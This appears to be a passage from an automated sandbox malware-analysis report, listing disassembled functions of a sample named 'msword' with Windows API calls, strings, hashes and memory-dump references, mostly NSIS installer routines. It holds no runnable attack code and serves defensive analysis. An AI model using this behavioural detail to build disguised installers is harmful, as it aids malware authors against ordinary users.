RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

@bG, xrefs: 00406162
RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004283D1,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004283D1,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004283D1,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

`G, xrefs: 0040246E
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not load %s, xrefs: 004024DB

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004283D1,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004283D1,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004283D1,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: success ("%s"), xrefs: 00402263
Exec: command="%s", xrefs: 00402241
Exec: failed createprocess ("%s"), xrefs: 004022C2

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32(?,?), ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00080C00,00000064,1F401F03), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNEL32(007DFD80), ref: 00402387

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
